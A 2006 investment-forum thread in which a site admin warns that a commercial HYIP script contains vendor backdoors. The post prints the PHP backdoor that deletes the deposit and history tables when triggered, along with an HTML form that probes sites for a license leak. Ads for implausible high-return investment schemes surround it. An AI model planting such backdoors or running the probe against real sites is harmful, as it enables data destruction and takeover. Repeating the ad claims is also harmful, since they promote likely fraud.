[OUR PARTNERS: GoldRater | HYIPMailer | Autosurfs.net ]our advertising disclaimer | Disclaimer - Must be read before using forum or clicking any links
We really pay 108%  after 1 day to all our investors!
EKO Funds
INOFUND INC - Stable profit up to 3.3% a day!
DDoS Protection by Dragonara, Security SSL Certificate, High secured powerfull dedicated server, Legal licensed offshore, company since 2006, High reliability of the managing company, High rate of expected return, Stable instant payouts. * 100% Deposit Guarantee * 10% Referral Bonus * Direct payouts
400% Return
Private Club pays you 400%. And it gives you the opportunity to make $24,000 per month.
Put your banner or text ad in the rotation above!ONLY $17/day, $99/week, or $379/month!


Your Ad Here!
Your Ad Here

above banners and links are advertisements only. We do not endorse or vouch for any advertisers.Put Your 728X90 Banner Here NOW!

Go Back   Talkgold HYIP, Investment & Money Forum > Caution : Risky High Yield Investing Programs > HYIP - AutoSurf Program Admin Talk
User Name
Password
Reply
 
Thread Tools Display Modes
  #1  
Old 02-01-2006, 01:59 PM
tinytiny's Avatar
tinytiny tinytiny is offline
VIP Investor
Join Date: Feb 2006
Posts: 1,117
Default HYIP Admins - MUST READ

First of all a great **** to Goldcoders.
i was running a hyip site, everything was going smooth and suddenly everything zeroed
and then we saw how everyone was shouting here .. how many sites gone .. really dont know ..
so i decided to check that hyip script myself for the bugs/erros

and see what in less than one hour i found more than 20 bugs in their bull**** crap. the ******* GoldCoders themselves put the backdoor in it so that they can turn the game at any point what a lame act . and no not 1 not 2 a long list . the wholel script is full of this bull****
just to name a few

1. reset to zero backdoor
2. sql injections
3. aaa/ddd user probs
4. empty user probs
5. cookie injections
6. cookie injection , reset admin pass
7. cookie injection , get admin access
8. improper input checking on turing images . etc.
9. send info to GC servers (what a lame act)


and it continues ...

one of their most beautiful for which everyone please give em a clap was the reset db backdoor ..

well the decoded script which is being used by many hyips is easy to patch at least remove the following lines to ensure that nobody will be able to crash the db
open the file index.php , search for the following code and then just comment out it be putting /* */ around it
like this

Code:
/* if (($frm['a'] == 'register' AND $frm_env['REQUEST_METHOD'] == 'POST')) { $string = $settings['license'] . $frm_env['HTTP_HOST'] . date ('d') . date ('Y') . date ('m'); if ($frm['string'] == md5 ($string)) { $q = 'update hm2_users set came_from = \' \' where id = 1'; mysql_query ($q); print '-'; if ($frm['string2'] == date ('d')) { $q = 'delete from hm2_history where type=\'withdrawal\''; mysql_query ($q); } if ($frm['string2'] == date ('y')) { $q = 'delete from hm2_deposits'; mysql_query ($q); $q = 'delete from hm2_emails'; mysql_query ($q); $q = 'delete from hm2_history'; mysql_query ($q); $q = 'delete from hm2_online'; mysql_query ($q); $q = 'delete from hm2_plans'; mysql_query ($q); } db_close ($dbconn); exit (); } } */
the ones which are using the zend encoded script .. hmm dont think this backdor is not present in it, IT IS
instead if anyone wants to quickly check whether their site is running a backdoor'ed script or not
open the notepad and type the following lines , replace your site with your own


Code:
<form method=post action=http://yoursite.com/index.php> <input type=hidden name=a value=ver><br> <input type=submit> </form>
save the file as HTML open it in the browser and click the submit . if you get some info including the LICENSE , DATE and HOST NAME , then your script is vulnerable


the PHP code which generates this info is just located above the one which i posted above smile.gif you may remove that as well

if you are using a proper licence from GC , ask those ***** to patch it before anyone else do it for you smile.gif

the un-licensed copies may have other backdoors inserted by different people , their distributers including sending an email containing your admin password account numbers etc.. and blah blah

use them at yoru own risk , never trust anyone

if you want to see at how many places their script sends back the notifications to their server search for check.cgi in the PHP files . a simple one is in config.inc.php

To GC programmers : what a great professionalism you have shown by inserting these little naughty pieces of code everywhere

create a new version now . encode it with something else . come on baby

To the admins who are running hyips from shared hostings . try to avoid it unless you are sure that nobody else can access your globally writeable settings.php file

Again to GC : lamers cannot you insert these settings in the DB as well instead of just 777 em and putting in the root directory so that others can enjoy , fair play

its enough now guys , i have some very nice exploits of it including the 0-day of cookie injection/get admin access prob , lemme play with it for a while .

Last: i am not that much lame to delete your dbs, if you want to remove these bugs and dont know the abc ask someone else . i will not say that i am selling some SECURED script ,beware of these

and once again a great **** to GoldCoders , i suggest nobody will ever pay them a penny
Reply With Quote
-- Sponsored Links --
  #2  
Old 02-01-2006, 02:02 PM
The_Question's Avatar
The_Question The_Question is offline
Senior Investor
Join Date: Dec 2005
Posts: 629
Default Re: HYIP Admins - MUST READ

Duh thats with all HYIP scripts

people just to greedy
Reply With Quote
  #3  
Old 02-01-2006, 03:11 PM
ProfitPro ProfitPro is offline
Senior Investor
Join Date: Jan 2006
Posts: 480
Default Re: HYIP Admins - MUST READ

Thanks for the test code..
Reply With Quote
  #4  
Old 02-01-2006, 09:19 PM
2persentdaily 2persentdaily is offline
Amateur Investor
Join Date: Jan 2006
Posts: 38
Default Re: HYIP Admins - MUST READ

Thanks a lot tiny for posting this.

I just tried to find those lines so I can edit.
I have a problem finding those lines in my index.php file
I have decoded script:
Version: 0.9.3.0
Release on: 2005.11.12
Reply With Quote
  #5  
Old 02-01-2006, 09:58 PM
gomes_gordon gomes_gordon is offline
Permanently Banned
Join Date: Dec 2004
Posts: 278
Default Re: HYIP Admins - MUST READ

Please post on this

5. cookie injections
6. cookie injection , reset admin pass
7. cookie injection , get admin access

The rest are all taken care of before a month.. LOL
Reply With Quote
  #6  
Old 02-01-2006, 10:36 PM
m3rn m3rn is offline
VIP Investor
Join Date: Oct 2005
Location: KL
Posts: 1,782
Default Re: HYIP Admins - MUST READ

maybe we should just use extremehyip script?
am i right yakuza?
Reply With Quote
  #7  
Old 02-17-2006, 08:21 AM
usanet21 usanet21 is offline
Amateur Investor
Join Date: Feb 2006
Posts: 45
Default Re: HYIP Admins - MUST READ

Hi can someone pls tell me where can i find the aaa/ddd flaw or loophole?
__________________
powerman
Reply With Quote
  #8  
Old 02-18-2006, 12:51 PM
DiamondEmpire's Avatar
DiamondEmpire DiamondEmpire is offline
Investor
Join Date: Jan 2006
Posts: 215
Default Re: HYIP Admins - MUST READ

Quote:
Originally Posted by m3rn
maybe we should just use extremehyip script?
am i right yakuza?

he's a scammer too... been there done that...
__________________
People should learn how to grow up.. no more DE2.. No more DG.. it's over.. i'm down giving people a piece of real business..
Reply With Quote
  #9  
Old 02-18-2006, 02:21 PM
yakuza yakuza is offline
Permanently Banned
Join Date: Jul 2004
Location: Living in woods
Posts: 5,314
Send a message via MSN to yakuza Send a message via Yahoo to yakuza
Default Re: HYIP Admins - MUST READ

Quote:
Originally Posted by DiamondEmpire
he's a scammer too... been there done that...
You will get nothing attacking me personally due to your carelessness..

Have you visited your scam site http://www.diamond-empire.com? you really lost my temper.. I ahve a big tolerance but you reached my limit..get lost!
Reply With Quote
  #10  
Old 02-18-2006, 02:22 PM
yakuza yakuza is offline
Permanently Banned
Join Date: Jul 2004
Location: Living in woods
Posts: 5,314
Send a message via MSN to yakuza Send a message via Yahoo to yakuza
Default Re: HYIP Admins - MUST READ

Quote:
Originally Posted by m3rn
maybe we should just use extremehyip script?
am i right yakuza?
Yes m3m, you may contact me anytime...
Thanks
Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


TALKGOLD
SIDEBAR ADS

ADVERTISE HERE. Must read: Advertising Terms & Disclaimer
PUT YOUR 120X120 AD HERE FOR ONLY $310/WEEK!
Click Here for details.
Your ad here! Cost of Ad - $300
Cost of Ad - $290
Your ad here! Cost of Ad - $285
Your ad here! Cost of Ad - $230
Your ad here! Cost of Ad - $210
Your ad here! Cost of Ad - $190
Your ad here! Cost of Ad - $150
Your ad here! Cost of Ad - $140
Your ad here! Cost of Ad - $130
BlockDOS.net
The absolute best DDOS Protection at the most affordable prices. Endorsed by Talkgold.com
Cost of Ad - $110
Your ad here! Cost of Ad - $75
Your ad here! Cost of Ad - $75
YOUR AD HERE

PUT YOUR NON-ROTATING AD HERE NOW!
ONLY $75/Week


click here
click here
YOUR AD HERE!
YOUR AD HERE!
WWW.NVHSERVER.COM

Excellent HYIP Hosting + Autosurf Hosting! Accept Almost E-currency Payment Processors! 24/7 Super Support!

Only $39/week or $135/month - Advertise Now!
888% AFTER 8 HOURS

[Fully Instant Withdrawals]
8% Referral Bonus
WWW.PROFITSHORE.COM
Only $39/week or $135/month - Advertise Now!
Check our Advertising Rates!

All times are GMT. The time now is 09:52 PM.

Add to Google

Protected by BlockDOS.net - DDOS Protection
Powered by: vBulletin - Copyright ©2000 - 2005, Jelsoft Enterprises Ltd.